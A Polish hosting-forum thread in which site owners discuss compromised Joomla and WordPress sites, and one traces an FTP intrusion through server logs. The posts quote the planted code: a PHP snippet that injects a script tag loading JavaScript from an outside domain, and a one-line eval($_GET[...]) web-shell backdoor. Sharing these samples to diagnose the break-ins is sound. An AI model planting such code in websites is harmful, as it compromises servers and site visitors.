Skocz do zawartości
ciasteczkazdusza

[home.pl] Czy to jest włamanie?

Polecane posty

Witam Wszystkich, to mój pierwszy post tutaj.

 

Dziś moja strona w joomla na home.pl zaczęła się dziwnie wyświetlać (brakujące obrazki).

Po sprawdzeniu plików okazało się, że dziś (25 kwietnia, ok. godz. 12-tej) zmienił wszystkie pliki index.php.

Został dodany w dość losowych miejscach taki kod w php:

 

<?php
#4ce7e8#
if(empty($ystd)) {
$ystd = "<script type=\"text/javascript\" src=\"http://www.casus-transport.pl/clik.php?id=345907\"></script>";
echo $ystd;
}
#/4ce7e8#
?>
Nie sądzę, że zrobili to ludzie z home.pl, więc zapewne jest to włamanie?
Zgłosiłem to home.pl, ale siedzą cicho.
Mogę przywrócić stary kod strony, ale jak tego uniknąć w przyszłości? (zmieniłem juz hasła, a i tak były dość mocne).
pozdrawiam,
Robert

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Możliwe, że korzystasz z jakiegoś dziurawego modułu i ktoś postanowił to wykorzystać - sprawdź czy nie ma dostępnych nowych aktualizacji zarówno Joomli jak i wszystkich modułów.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Ostatnio miałem problem z wysyłaniem maili z VPSa. Na serwerze miałem uruchomione wiele usług, które sobie pracowały bez problemów, więc nawet nie zaglądałem. Któregoś dnia dostałem mail, że dysk się zapełnił.

 

Wchodzę, a tam kolejka 20 miliardów odroczonych maili i IP już trafiło na 2 RBL. Dziura? Gdzieś w WordPressie. W ponad 150 plikach dodanych rootkit/shell. Kod w stylu <?php eval($_GET['asdqg8f0g']); ?>. Z gotowej paczki WP porównałem MD5, poleczyłem pliki i teraz czekam na powtórkę sytuacji. W starych logach nic nie widzę, bo okazało się, że problem był od ponad miesiąca, a tylko z takiego czasu mam access.log'a, więc nie wiem po jakim requeście zaczęło się spamowanie. Hasła - poziom supertrudny.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Pomoc home.pl w tej sprawie ograniczyła się do rad upgrade joomli oraz przesłania logów serwera na moją prośbę.

Z przesłanych logów wynika, że ktoś z adresu 193.255.156.84 (wg whois należącego do uczelni w Turcji w Istambule) podłączył się przez FTP i podmienił stony index.php.

Najwyraźniej hasło było zbyt słabe.

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×